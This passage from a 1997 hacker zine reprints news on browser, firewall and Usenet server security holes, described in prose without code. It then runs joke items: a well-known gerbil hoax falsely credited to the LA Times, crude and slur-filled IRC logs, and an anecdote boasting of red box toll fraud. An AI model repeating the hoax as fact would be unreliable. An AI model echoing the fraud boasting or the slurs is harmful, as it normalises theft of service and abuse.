Shockwave doesn't have the same security model," said de Vitry. "Unlike the other [recent security holes], which allowed you to erase a person's hard drive (and, through complicated means, obtain information), this one you can easily get information back. It has interesting uses." Using these same concepts, it's possible to break the security of corporate firewalls. "The other main vulnerability," said de Vitry, "is the fact that it can use [the Web's] hypertext transfer protocol to access any Web server." Including those on secure intranets - provided you know the URL. The victim must be using Netscape Navigator 3.0, or possibly 2.0, on either the Windows 95 or Windows NT platform, and have Macromedia's Shockwave plug-in installed. Finally, Netscape Email must be used as the email interface. While de Vitry claims he informed both Netscape and Macromedia late Tuesday night, neither company has contacted him. Dave Kennedy, research team chief with the National Computer Security Association, commented that "[The security breach] doesn't surprise me, and I predict it will happen more in the future. Internet Explorer had three last week, Java had one, and now it's Netscape's turn in the barrel. "I have more confidence in Netscape than Internet Explorer with respect to the security of their different products," said Kennedy. "But with the plug-in problem, my peers in the security community are scared of the implications of the increased user functions without regard to security," he said. Shockwave is Macromedia's proprietary technology for delivering and experiencing multimedia over the Web for Windows or Macintosh computers. The plug-in modules are created with Macromedia's Director multimedia authoring tool. As of Wednesday evening, Mary Leong of Macromedia said the company had been unaware of the bug. "The Shockwave team are now in investigation mode in full force," she said. 
"We'd really like the opportunity to verify this, and then offer insight or solution if applicable," she said. Netscape could not be reached for comment.

©1993-97 Wired Ventures, Inc.
_____________________________________________________________

H.323: It's 'Open Sesame' in Firewall Speak
by Kurt Opprecht

7:30pm 7.Mar.97.PST -- Corporate firewalls, electronic fortresses that safeguard company secrets, may soon let their guard down a little to allow Internet telephony to seep through - that is, if everyone involved speaks the same language. An industry group led by Intel and Cisco Systems on Thursday completed an Internet video telephone call through a corporate firewall, a procedure they say did not compromise the overall security of the network. The group said this development will make possible multimedia support in applications like email. What made the demonstration possible was the use of H.323, an Internet communications standard for audio and video telephony, said Milind Khare, product manager in Intel's architecture labs. With widespread use of this lingua franca in firewall networking and telephony technologies, all systems should be secure. If a packet speaks H.323, then the firewall supporting the protocol will recognize it as an Internet phone call and let it pass into the network. But a packet that doesn't use H.323 will not be allowed inside. Still, the notion that a firewall will let some forms of outside communications into a network could be a little disconcerting to corporate netizens. Nonetheless, Khare said the prospects for mischievous and malicious attacks, including spoofed packets masquerading as Internet phone calls, are not possible. "As far as we know, [H.323 communications] are not spoofable. Hypothetically, if you could spoof them, you could do nothing more than conduct an Internet phone call," Khare said. Security experts concurred that this allowance represents little compromise to a corporate network.
"Any time you open up a new service that allows any type of data through, that poses a risk," said Eugene Spafford, professor of computer science at Purdue University. The problem, Spafford maintains, is that too many people think of a firewall as an all-in-one fix to security problems. "It's like saying, if we put a fence around the building with a guard at the gate we'll never have to worry about security. That's ridiculous," he said.

©1993-97 Wired Ventures, Inc.
_____________________________________________________________

Go Ahead, Be Paranoid : Hackers Are Out to Get You
March 17, 1997
By STEVE LOHR

In a chilly, windowless room in a New York suburb, four men are tapping furiously at their laptop computers. Their mission: to crack into the computer system of a major U.S. corporation. Things seem to be going well, for them. "All right, we're through the firewall," announced one bearded hacker. A few moments later, a second practitioner of high-tech mischief pronounced himself pleased by what he saw inside -- a digital picture of vulnerability rendered by the lines of computer code dancing across his screen. "Looks like we can toast it," he said. Charles Palmer, a slender, bearded 40-year-old computer scientist, looked on with pride at the members of his team. Skilled hackers, Palmer noted, are scarce these days, at least ones that he will hire. "It's hard to find good people in this field who do not have criminal records," he explained. Palmer and his team work for IBM, and their brand of computer hacking is legal. Companies pay the IBM squad to attack their computer systems to test how well they can stand up to the increasing assaults by real hackers. The growing ranks of cyber intruders are engaged in everything from snooping around to "parking" pornography and pirated software on unsuspecting corporate machines to computer-assisted fraud and theft.
White-hat hackers, like those at IBM, are only one kind of computer-security professional whose skills are much in demand today. Once an arcane specialty, computer security has moved into the mainstream. As companies rush onto the Internet, they benefit from improved communication with customers, suppliers and far-flung employees, but they also take on far greater risk that their corporate computer systems will be breached by outsiders with malicious intent. The dangers of a networked world have created boom times for computer-security consultants, auditors, cryptographers and others. Now they must contend with pushy headhunters as well as hackers. Five years ago, six-figure salaries were rare in the security field. Today it is not uncommon for skilled computer-security veterans to be making $200,000 a year or more. Recognizing a seller's market for computer-security expertise, Wietse Venema has come to the United States, and he's selling. A computer scientist from the University of Eindhoven in the Netherlands, Venema is the co-author of Satan, a sophisticated software program intended to find security flaws in any computer system linked to the Internet. The 45-year-old Dutch researcher is considering offers from IBM and other leading American computer companies. "Many people are interested in my capabilities now," he observed cheerfully. Experts like Venema are suddenly stars because corporations are spending more on computer security. This year, companies worldwide are expected to spend $6.3 billion on security for their computer networks, estimates Dataquest, a market-research firm. Within three years the security price tag is projected to more than double to nearly $12.9 billion -- a figure that is only for services supplied by outside contractors, so it excludes spending on in-house staff, security software or hardware products. The industry in the United States, the world leader in computer security, is composed of hundreds of companies. 
They run the gamut from large companies with worldwide computer consulting practices, like IBM, Science Applications International Corp. and Perot Systems, and Big Six accounting firms, like Coopers & Lybrand, Ernst & Young and Deloitte & Touche, down to one-man independent consultants, like Seiden. Fueling the surge in computer-security spending is fear. The corporate concerns are heightened with every report of hackers defacing well-known World Wide Web sites, like the recent attacks on the sites of the CIA and the Department of Justice. The FBI says few intrusions into corporate computer systems -- 15 percent at most -- are reported to law-enforcement agencies. But the handful that are reported, like the 1994 case of Russian hackers who tapped into Citibank and made $10 million in illegal fund transfers (all but $400,000 was recovered), tend to cause alarm. "The business is not so much network security as it is network insecurity," noted Alice Murphy, an analyst at Dataquest. "There's so much anxiety out there now." Just how great the threat is to corporate computer systems is a matter of debate. The Internet, observes Peter Neumann, a computer scientist at SRI International, a research group in Menlo Park, Calif., was never really designed to be secure. Once the bailiwick of a small community of researchers, it is starting to be used as a freeway of commerce. "The infrastructure is vulnerable," Neumann said. "From that larger perspective the risks are enormous." Dan Farmer, the co-author of Satan with the Dutch researcher Venema, did a survey of 1,700 corporate and government Web sites late last year and found that more than 60 percent of them had "serious potential security vulnerabilities." Farmer, a programmer at Sun Microsystems Inc., did not break into the computer systems, but he said they were open to attack and often could be severely damaged. (His survey results are posted on the Web.) 
Yet there is a significant difference, some analysts say, between potential vulnerability and the actual business risk to corporate computer systems. "There is risk, but the threat tends to be vastly overstated," said George Colony, president of Forrester Research Inc., a consulting firm in Cambridge, Mass. Forrester estimates that losses from fraud in Internet commerce are likely to be roughly $1 for every $1,000 of business. To put the matter into perspective, the fraud losses in cellular phone service are $20 for every $1,000, according to Forrester, while the losses on credit-card transactions are nearly $2 for every $1,000 of goods charged. Still, even skeptics, like Forrester's Colony, agree that computer security requires continuous attention. "It is a manageable risk, and it should not deter companies from jumping into Internet commerce," Colony said. "But I also tell our clients that they should think of computer security as a guerrilla war that will last forever." The FBI is treating the battle against computer crime as a long-running campaign. All new agents are now trained in cyberspace investigations as part of the curriculum at the FBI Academy in Quantico, Va. And last year the bureau established three computer-crime squads in San Francisco, New York and Washington, to pursue cybercrime more aggressively. "We're really on the cusp of this becoming a major problem," said James Kallstrom, head of the FBI office in New York. "As more and more of the economy goes digital, there are huge incentives for criminal attacks on American corporations." Computer crime, of course, comes in many forms. An employee with a grudge and access to a company's computer network may well be far more dangerous, and costly, than even the most artful hacker. 
A survey released two weeks ago by the Computer Security Institute, and conducted on behalf of the FBI's computer-crime unit, estimated computer security losses last year at $100 million -- a total only among some 250 companies and organizations that would place dollar figures on their losses from fraud, theft of trade secrets and other breaches. The criminal hackers have long been engaged in a kind of cat-and-mouse game with law-enforcement agencies and private computer-security experts. And that game is increasingly being played at a higher level, with greater skill and new tools. The cell-phone hackers of the past, who electronically jimmied phones for the thrill and free phone service, have graduated to Web-site hacking. Today there are an estimated 440 hacker bulletin boards, 1,900 Web sites purveying hacking tips and tools, and 30 hacker publications like "Phrack" and "2600: The Hacker Quarterly." There are readily available software programs for hacking tactics like "war dialing," "sniffing" and "fingering" -- all used to exploit security weaknesses in computer systems. [Hacker publications? Oh no! Evil knowledge spreaders!] "As the stakes become higher, the technical sophistication of the people doing this kind of illegal activity is increasing," said Edward Hart, a senior vice president of Science Applications International. Today there is a brisk illicit market in hacking, according to security experts, with the street price for breaking into a corporate Web site typically in the $8,000-to-$10,000 range. Bonus payments are usually demanded for trade secrets pilfered or damage inflicted on a competitor's computer system. Limiting the risk, and damage, to corporate computer systems is the goal of Palmer and the other security specialists at IBM. The test hacking done by his team is mainly a fact-finding tool, and only one of many. 
The authorized break-ins by these groups, called "tiger teams," are often more valuable as a marketing tactic than as a research tool. Thick and exhaustive studies of a company's computer security can be met with yawning indifference by top executives, but a break-in gets their attention. Mundane rules, not high-tech wizardry, are crucial to reducing security risks. A robust firewall to filter what electronic traffic gets into a company's computer system is helpful, but it can be a Maginot Line approach to security -- the real weaknesses are elsewhere. To work from home, employees may have dial-up modems at their desks, unprotected by firewalls or even passwords. Employees, security experts warn, must be told to give their passwords to no one; one scam is for hackers to call new employees, pretending to be members of the corporate technology staff doing a check of passwords. Another frequent weakness is simple physical security, watching who goes in or out of the building. These are hectic times for security consultants like IBM's Nick Simicich, a 44-year-old self-taught programmer. He works from his home in Boca Raton, Fla., equipped with powerful computers running Linux, a shareware program that is the operating system of choice for hackers. Mostly, though, Simicich is on the road -- 85 percent of the time, he estimates -- logging perhaps 150,000 air miles a year. Continental, the airline he flies most regularly, invited Simicich to a company parade last year. He proudly calls himself a "paid professional paranoid." His goal, he says, is not to make corporate computer systems immune to hackers. "That's impossible," he explained. "Our real goal is to raise the bar. First, we do want to make it harder for them to break in, so the average hacker moves to an easier target. Second, when they do get in, we want to ensure that the damage is limited." 
©1997 The New York Times
_____________________________________________________________

Threat of 'techno' terrorism being explored
Air travel, stock trading among potential targets
March 18, 1997

SAN FRANCISCO (CNN) -- Last year, a tree fell across a power line in Wyoming, causing a rippling blackout across nine Western states. Now, security experts are wondering if a computer hacker could throw a virtual tree -- a disruptive computer message -- across the nation's communication lines, causing a meltdown of vital information systems. "The telephone system, the public switch network, is vulnerable," says Clinton Brooks of the National Security Agency, who serves on a presidential panel looking at ways to outsmart potential hackers. Also on Brooks' litany of potential targets: The air traffic control system, stock exchanges, the Defense Department, the Federal Reserve, the IRS and Social Security. And he says many other information systems that deliver basic needs to people in their daily lives are also subject to attack -- traffic lights, banking systems and ATM and credit card networks. Dangers and defenses: In October, the Commission on Critical Infrastructure Protection is set to issue a report on the possible dangers of such cyber terrorism. The commission's goal is to predict the targets, anticipate the methods that might be used and figure out defenses. "We need to all be slightly paranoid, and it's good to start thinking this way about the threats -- the inside and the outside threats," says Ron Skelton of the Electric Power Research Institute, an organization of electric utilities. The stakes are high. For example, air traffic controllers, linked electronically, escort plane loads of passengers from city to city. Since the days of the telegraph, railroads have used remote data to safely shuttle trains from track to track. If those systems are compromised, trains and planes could crash.
"We have identified more than 100 foreign nations" capable of "information warfare," Brooks says.

Basic steps can counter threat

Brooks wants a centralized national reporting agency to monitor the risks and coordinate reactions. And he says it should be established sooner rather than later. In the meantime, some of the early solutions to cyber terrorism appear to be fairly basic:

Separate systems. Air traffic controllers use at least three independent systems, instead of a single system, to land a plane.

Isolate circuits. Data at the San Francisco command center of Pacific Gas and Electric runs down private lines that do not go through hacker-accessible telephone switching systems, as voice calls do.

Encrypt data. This is particularly useful in situations where redundant systems or isolated circuitry isn't feasible.

"Encryption is probably the single most powerful tool that we could employ to protect ourselves in cyberspace," says Jim Bidzos of RSA Data Security.

San Francisco bureau chief Greg Lefevre contributed to this report.
_____________________________________________________________

Usenet Servers under Assault
Michael Stutz
6:04pm 17.Mar.97.PST

One of the largest automated attacks against Internet servers since 1988 began Saturday and continued into Monday. Attacks on Monday marked the sixth attempt at cracking potentially thousands of Usenet news servers, after four such attacks on Saturday and one on Sunday. Utilizing a well-known bug in InterNetNews server (INN), a complete and very popular Usenet news server package, an unidentified party posted four Usenet control messages on Saturday that mail copies of the password file and other information about a system. Saturday's attacks mailed the files to a machine in Europe owned by IBM. However, messages on Sunday and Monday were sent to different addresses - a machine at Rice University and a corporate machine in Germany.
The message headers were spoofed so that they appeared to have originated from David C. Lawrence, a well-known Usenet administrator who oversees the creation of hierarchies. The attack works by gaining access to a news server via a hole in INN. The hole affects all versions of INN up to 1.5. INN 1.5.1, distributed since December 1996, remains unaffected. Patches are available from James Brister at the Internet Software Consortium, where INN is maintained. Brister concurred that the bug is nothing new, saying that the fixes have been available for some time. These attacks succeeded because not all news administrators have updated their systems. Matt Power, a post-doctoral associate at MIT, had written a patch that fixes the security hole, originally making it public two years ago. "I finally got them to include it in the distribution last December," he said. "The [attacker's] script copies the system's password file along with four other files and emails them to a remote address," said Power. With easily obtained software, the attacker could then attempt to crack one-way encrypted Unix user passwords with brute force. The other files - the system's inetd.conf file and output of the "uname" and "who" commands - could provide valuable information to hack the system in other ways, Power said. The bug involved was just recently reported in a CERT advisory dated 20 February - presumably long enough for the cracker to have exploited it but possibly not long enough for news administrators to have fixed their software. Smaller or understaffed operations, where sysadmins may not have yet heard of the bug or implemented the fix, are especially vulnerable. Power likens this sort of attack to one of the Net's most notorious and widespread attacks. "It is rare to hear of a successful attempt to automate the penetration of [probably] thousands of servers throughout the Internet," he said in an email to Wired News. 
"I don't know of any similar event that has taken place since the Robert T. Morris Internet worm of 2 November 1988."

©1993-97 Wired Ventures, Inc.
_____________________________________________________________

Usenet News Servers Take a Beating
by Michael Stutz

7:59pm 18.Mar.97.PST -- The bombardment of Usenet news servers across the Internet that began Saturday continued Tuesday, and while a student at Rice University had been identified in connection with the attacks, it was not yet known whether this was a prank or if the attacker had malicious intent. The machines were attacked via a well-known hole in the interpretation of Usenet control messages, which normally send information to individual news servers. The hole exploited a bug in popular news server software that allowed the messages to contain commands to be executed on the news server machine. Though the hole is a known bug with a published fix, a great deal of machines have been compromised. Many Usenet administrators may still be unaware of the problem. CERT, the Computer Emergency Response Team, issued a special bulletin Tuesday to reach more administrators. "At this time [Monday], 40 sites were known to have been compromised," said CERT's Terence McGillen. "As of [Tuesday], that number is up to 130. Right now, the CERT team is working in real time with administrators at the affected sites. As the days go on this week, we'll post updates as to the activity - it may die down, or it may not." McGillen was reluctant to speculate on the identity of the perpetrator. "We don't focus on that," he said. "We're not concerned in who the intruders were - just in the means they used to attack the sites." The attack emailed a machine's encrypted password file and other sensitive information to a remote address - one of which had been an obviously hacked account at Rice University in Houston, Texas. Officials at Rice University said they had found their man.
"We do know who it is and will be taking appropriate steps," said Kathryn Costello, a university vice president. "We caught him thanks to all of the security measures we had implemented - it was a good test case for us, actually. We knew what terminal he was working at and were able to quickly identify him." His name has not been released. "The Rice news server was the point of attack," Costello said. "This could not have affected other university data because it is a standalone system kept separate from the rest of our computing facilities," she said. There has been no reported further compromise to these systems as a result of attack, but some administrators tested the security hole in question, causing more of the system-cracking control messages to be broadcast to all of Usenet's servers. One of those additional messages was possibly from another "real" attacker, said David C. Lawrence, the news administrator whose email identity was spoofed by the cracker. "[While] several later attacks were really administrators who let their well-meaning tests escape to the world, a couple of attacks have not yet been classified; at least one of them looks more like a real copycat attack than an innocent mistake." In order to gain unauthorized access to any of the attacked systems, the cracker would first have to run software to break the password information. So far, no administrators are aware of any such further compromise on their systems. "I have talked to several dozen sites at this point, well over a hundred," said Lawrence. "None have yet reported any additional compromise stemming from this attack. A significant factor in this is that the password file delivery destination machines in the original attack - two hosts in IBM Sweden's network - were unreachable from pretty much the time that the attack began," he said. 
Speaking of the possible copycat attack, Lawrence said it was too early to speculate whether the person would receive anything he could use before being nabbed, anyway. "First he has to break some passwords, then he has to contact the machine that has the account for the broken password, if he can get past their firewall and any additional security guards in place," he said. Things could have been worse. While these attacks seem to be just mailing a copy of the password file to an outside email address - presumably to be later cracked with brute force - virtually any system command could be performed, including the erasing of system data. This is clearly a serious hole. "It was characterized as an attack on the infrastructure, which I would say is serious," said McGillen. "This problem has been around for a while, it's just that [network administrators at these sites] are swamped with work. We don't expect this to go away overnight."

©1993-97 Wired Ventures, Inc.
_____________________________________________________________

[Article provided by Keystroke]

Man waits 20 years for phone line but dies before getting it

BUCHAREST, Romania (AP) -- Romanians are used to waiting a long time for a telephone. But 20 years for a dialtone was too long for Constantin Coltea. Coltea, who died last year, applied for a telephone line in 1977. The state telephone company, Romtelecom, responded this month, according to the Evenimentul Zilei daily. In its letter, Romtelecom told Coltea to confirm within 15 days that he still wanted the line or his request would be dropped. Coltea's 81-year-old widow, Caliopi, said she no longer can afford it, living on a $14 monthly pension. Lidia Toboc, a Romtelecom spokeswoman, could not confirm Coltea's case, but said there were two cases a year ago involving applicants who waited 15 years for their service. Since then, she said, "our management has been trying to resolve long-delayed applications."
Bribes of up to several hundred dollars are common in Romania to get a line installed more swiftly. The government plans to privatize 30 percent of the phone company.
_____________________________________________________________

[This editorialised article is courtesy of ec|ipse & Keystroke, they don't know who it was that added the top 10 list. I know this has nothing to do with hacking, phreaking, etc, but it's too damn funny not to publish.]

Subject: Only in California... (fwd)

You wanted raunchy? You got it!...times three! Here's one for the archives...

This is an actual article from the LA Times:

"In retrospect, lighting the match was my big mistake. But I was only trying to retrieve the gerbil," Eric Tomaszewski told bemused doctors in the Severe Burns Unit of Salt Lake City Hospital. Tomaszewski and his homosexual partner Andrew "Kiki" Farnum had been admitted for emergency treatment after a felching session had gone seriously wrong.

"I pushed a cardboard tube up his rectum and slipped Raggot, our gerbil, in," he explained. "As usual, Kiki shouted out 'Armageddon', my cue that he'd had enough. I tried to retrieve Raggot but he wouldn't come out again, so I peered into the tube and struck a match, thinking the light might attract him."

At a hushed press conference, a hospital spokesman described what happened next. "The match ignited a pocket of intestinal gas and a flame shot out of the tube, igniting Mr. Tomaszewski's hair and severely burning his face. It also set fire to the gerbil's fur and whiskers which in turn ignited a larger pocket of gas further up the intestine, propelling the rodent out like a cannonball."

Tomaszewski suffered second degree burns and a broken nose from the impact of the gerbil, while Farnum suffered first and second degree burns to his anus and lower intestinal tract.

OK, here's the top ten things that scare me the most in reading this story:

10. "I pushed the cardboard tube up his rectum..." Ouch!!!

9. "So I peered into the tube..." Aaaaaaahhhhhh! I'm sorry, but that's like looking through a telescope into Hell. I'd rather use binoculars to stare at the sun.

8. That poor gerbil (who obviously suffers from low self-esteem) being shot out of the guy's anus like Rocky the Flying Squirrel on Rocky and Bullwinkle.

7. Suffering a broken nose from a gerbil being launched out of someone's anus. I'm just guessing, but I seriously doubt said gerbil was springtime fresh after his little journey into Kiki's 'tunnel of love'.

6. People walking around with these volcanic-like pockets of gas in their rectums.

5. People who do this kind of thing and then admit what they were doing when taken to the emergency room. Sorry, but I think I would have made up a story about a gang of roving, pyromaniac, anal sex fiends breaking into my house and sodomizing me with a charcoal lighter before I admitted the truth. Call me old fashioned, but I just can't imagine looking at a doctor and saying, "Well Doc, it's like this. See, we have this gerbil named Raggot and we took this cardboard tube..."

4. "First and second degree burns to the anus". Wouldn't this make the burning itch and discomfort of hemorrhoids a welcome relief? How does one ever take a healthy poop after something like that? And the smell of burning anus must be in the top five most horrible scents on the face of God's green earth.

3. People named "Kiki" which is obviously a Polynesian word for 'idiotic white men who insert rodents up their butts.'

2. What kind of a hospital would hold a press conference on this??

1. This happened in Salt Lake City. What kind of people are those Mormons?? (I'm starting to get a whole new image of the Osmond family)
_____________________________________________________________

©1997 HAVOC Bell Systems Publishing

No part of this publication may be reproduced in whole or in part without the expressed written consent of HAVOC Bell Systems Publishing. [Unless you're leet, then it's ok.
Well, just so long as you don't plain copy the zine. If you wanna take this to the copy center and blow it up and put it on the ceiling above your bed, we're not gonna try and stop you.]
_____________________________________________________________

 -------------------
--=[Reader Survey]=--
The HAVOC Technical Journal
 -------------------

[This survey is designed to help us better suit our magazine to the reader, or we may just be trying to get a good laugh, but we haven't decided yet.]

Name:
M/F:
Age:
Occupation/grade:
City:
State:
Zip Code:
Country:
Area Code:
SSN: [reference purposes only ;)]

Why are you reading this?

Where'd you get it?

I am into:
[ ] Hacking
[ ] Phreaking
[ ] Cracking
[ ] Warez
[ ] Coding (any)
[ ] Anarchy
[ ] Carding
[ ] Law enforcement
[ ] Public education

I am guilty of the following:
[ ] Eating paint chips
[ ] Being the leader of a cult of programmers who intend to commit suicide
[ ] Possession or intent to distribute THTJ
[ ] A misdemeanor (if so, describe)
[ ] A felony (if so, describe)
[ ] Physically attacking bell employees
[ ] Working for a phone company

On a scale of 1 - 10, with 10 being leet, 0 being lame, I am best described as:

[Send all replies to mazer@cycat.com]
_____________________________________________________________

 --------------
--=[IRC logs]=--
Humorous adventures in IRC
 --------------

*** Your nick is now Sub-Male
*** Now talking in #freebsd
> is this a sex channel ?
but the new one will be a package deal Uuuh, one 9-gig drive is not good
*** You were kicked by W ((WyzeOne) idiot)
#freebsd unable to rejoin channel (you're banned!)
_____________________________________________________________

[This could very well be the definition of 'AOL lamer' used in Webster's, courtesy of Scud-O.]

CuM On BiAtCh! U wAnT Me TO PulL ThE InSiDe HaCk? I SAID NO 3reet teXt f00l BiTcH gee you are erret.... hackers2 CuM On BiTcH, Do U WaNT tO danCe? disco? U rEaLlY aRe A dUmb PiEcE Of ShIt ArEn'T U?
no you are you just got taken over fool So DoNt CaRe AbOuT tHaT sHitTy ChAnNeL why the FUCK do you keep mixing caps? AlL I CaRe AbOuT Is FuCkInG U uP! go ahead what you got you little warez puppy? EvEr BeEn On AoL LamMah? nuke.exe? no... but i think you have SaTaN you know ANY thing about ip? satan? you dumb ass... satan is a prog fro cracking hosts dumb fuck what is a routing table? Im In WpSx BiTcH aNd U ArE On SoMe ShItTy ChAnNeL loOkS lIke U dA dUmB aSs excuse me? cant tell what ya wrote with all those ereet typing skills SaTaN iS tHe UlTiMaTe HaCkInG tOol DuMbAsS! Ha LaMaH U DoNt KnOw ShIt NO YOU dont know shit who wrote satan then? ThAtS sOmEtHiN To Be PrOuD Of Huh? DuMb FuCk WHO WROTE IT? btw, the boys in #hackers are loving this conversation ReAl Ppl DoNt GivE NaMes DumB FuCk R u ThAt sTuPiD? HeH LaMah! you havcent even USED satan have you? YeS I hAvE WHO WROTE IT? KnOw OnE KnOwS WhO wRoTe It LitTle ShIt you are a dumb fuck.. go ask someone ya lammah AlRiGht ThEn SmArT aSs WhO WrOtE It? dan farmer AlRiGhT sO Who Did SmArT Ass Fuck OFf u SoMe LiTtLe NeRd ThAt DoeSnT KnOw ShIt BiTcH no im the fuckin football captian
_____________________________________________________________

[This log was provided by Keystroke from an incident shortly after TiSDaL had taken over the channel #-=|\|E\\'B|ES=-.]

age/sex check 14
*** Joins: aVeNGe1 (Technology@modem3.cherryhill.wserv.com)
*** Joins: |B0GS| (~revenge1@modem3.cherryhill.wserv.com)
*** Joins: |D0OR| (Technology@modem3.cherryhill.wserv.com)
*** Joins: aVeNGe6 (Technology@modem3.cherryhill.wserv.com)
*** Joins: |F0ND| (Technology@modem3.cherryhill.wserv.com)
*** Joins: |M0HO| (Technology@modem3.cherryhill.wserv.com)
give me ops!!!!!!!! * Loom is 16/f nice bots clones even or i'll take them with my army!!!! wanna watch em all ping out? no not really take me baby come on Tisdal give him ops rape me rape me and my phriend
* TecHnoKiD take TiSDaL and bites his neck!!!!
*** Joins: |B0TH| (Technology@modem3.cherryhill.wserv.com)
damn bot's in the wrong channel
*** Quits: |D0OR| (G-lined)
*** Quits: aVeNGe1 (G-lined)
*** Quits: |M0HO| (G-lined)
*** Quits: |B0TH| (G-lined)
*** Quits: |F0ND| (G-lined)
*** Quits: TecHnoKiD (G-lined)
*** Quits: |B0GS| (G-lined)
lol see what that gets ya
_____________________________________________________________

[This log courtesy of Redtyde from #stupid.]

watch youf fuckin mouth redtyde, that inappropriate for this channel alright.. why were the blond girl's titties square? because she forgot to take the tissues out of the box first uh ah HAhaHAhaHHaHaHaHhAhaHAhH holy shit that was hilarias!
_____________________________________________________________

[Log of a conversation over getting ops in #phreak.]

<|-A|pHa-|> hello
> hi
<|-A|pHa-|> do you need any shellz
<|-A|pHa-|> i can you over a hundred shells
<|-A|pHa-|> with the pw's
<|-A|pHa-|> under one condition
> wassat?
<|-A|pHa-|> y'all gimme ops
> well, that's against company policy
> hold on, i'll talk to my manager and see what i can do
<|-A|pHa-|> ok
<|-A|pHa-|> also t offer i have a fserve
> he says i don't get paid enough to do that
> oh, ok what's on it?
<|-A|pHa-|> and a web page
<|-A|pHa-|> with the anarchist cookbook as a link.
<|-A|pHa-|> also how to make bongs
<|-A|pHa-|> and other pot smokin apartues
> ok lemme relay this to the boss
<|-A|pHa-|> um...NRA
<|-A|pHa-|> alsp
<|-A|pHa-|> also
<|-A|pHa-|> and bass fishin links
<|-A|pHa-|> mirc scripts
<|-A|pHa-|> how to hack links
> i don't see how he can turn this down
> but he says our status quo would be in jeopardy, what's that mean?
<|-A|pHa-|> i dunno
<|-A|pHa-|> but relay the other stuff thats on my page to him
<|-A|pHa-|> on my fserve i have mirc scripts,doom special edition,descent
<|-A|pHa-|> um..
<|-A|pHa-|> programs for computers
<|-A|pHa-|> irc programs
> he's gonna have to talk to the regional manager, i had our secretary write it all down though, it sounds like a great deal in my opinion
<|-A|pHa-|> ok thanx
<|-A|pHa-|> if i have to go soon i will come back later for the answer
> cool beans
_____________________________________________________________

[IRC quote of the month]

poof puts the "cocksucking moron" back in "cocksucking moron"
_____________________________________________________________

 ----------------------
--=[Funny Phonecalls]=--
The HAVOC Technical Journal
 ----------------------

[This is from a conversation between Scud-O and an AT&T ISP operator, which took place after Scud forgot his password. AT&T uses 'security words' to verify that you are who you say you are, and Scud's was 'fuck you'.]

Sir I'm gonna need your security word. My security word? Well, that would be FUCK YOU! Uhh... correct... here is your password, and you need to change your security word sir, it's offensive. Oh yeah? Well fuck you!
_____________________________________________________________

[_Electro_ made this call during lunchtime at school, and I believe the cafeteria food had sufficiently intoxicated him.]

BC Tel Operator, How May I Help You? Yes, Hi. How are you doing today? Fine Thanks, How Can I help you? Well I was gonna pay with my calling card, but I can't seem to find it. Would you like me to insert a coin instead? Yes go ahead, insert your quarter. No prob (I PLAY MY RED BOX TONES WITHOUT PUTTING IN 5 CENTS FIRST) I am sorry sir you aren't putting in real coins Hmmm. . .Yes, But. . . enough about me, lets talk about you Excuse me? So how's life? How are the kids? Oh Yeah, Can You tell me whats wrong with my red box? Very Funny. . .
_____________________________________________________________

[This interesting conversation took place between shoe and the local bell operator.]

YES? BELL SOUTH HERE!
WE ARE SMART AND NOW ONLY HAVE 4 FONES IN THIS CITY THAT PEOPLE CAN REDBOX! Uhh, ok. Quit yelling I gotta ask you somethin. Go on... I need the number for Cuntflex. Excuse me? You heard me, Cuntflex. That number would be 581-FUCK-YOU Are you sure? I tried that and got your house.

[Well, ok it didn't all happen, but he did ask her that, and she did give him that number.]
_____________________________________________________________

 ------------------------                  ----------------------
--=[HAVOC Bell Systems]=--                --=[Acknowledgements]=--
 ------------------------                  ----------------------

Agrajag   : PLA Michigan                  btm       : Elite
darkcyde  : #phreak old-schooler          digipimp  : Co-conspirator
Digital_X : Nemesis                       dr1x      : Perverted bastard
disc0re   : Distributor                   ec|ipse   : Hysterical bastard
Keystroke : Submissions Editor            Jisa      : She's just a girl
KungFuFox : Acting Editor                 RBCP      : Funniest man alive
memor     : Ueberleet French phreak       shoelace  : Kewl fellow, #phreak'er
psych0    : Writer                        WeatherM  : Pan1k's right hand man
REality   : #phreak's southern accent     yesimlame : No, he's not
Redtyde   : #phreak not so old-schooler   #phreak   : My home on IRC
Scud-O    : Mighty Editor in Chief        Everyone who I get along with.
theLURK3R : Coder guru
UnaBomber : Tired of IRC
_____________________________________________________________

This Month's Question: If a phreak calls from the forest, and nobody's around to keep him out of trouble, what're the odds that the call will be free?

[The HAVOC Research Department of HAVOC Bell Systems has determined that there is a 90% chance that it will be. What about the other 10%, you may be wondering? Smokey the Bear fights more than fires, he's with the Gestapo.]
_____________________________________________________________

Next Month:

[My crystal ball is currently being refurbished, and cannot predict what is to come in THTJ10. Stay tuned for further details as they emerge.]

Issue 10 is out May 1st!
Send all articles for issue 10 to Keystroke at: keystroke@thepentagon.com

==========================================================
= Is this copy of The HAVOC Technical Journal skunked?   =
= If this file doesn't read at 165968 bytes, it probably =
= doesn't have a born on date! Get a fresh copy from our =
= site at: http://www.geocities.com/SiliconValley/8805/  =
==========================================================

--=[EOF]=--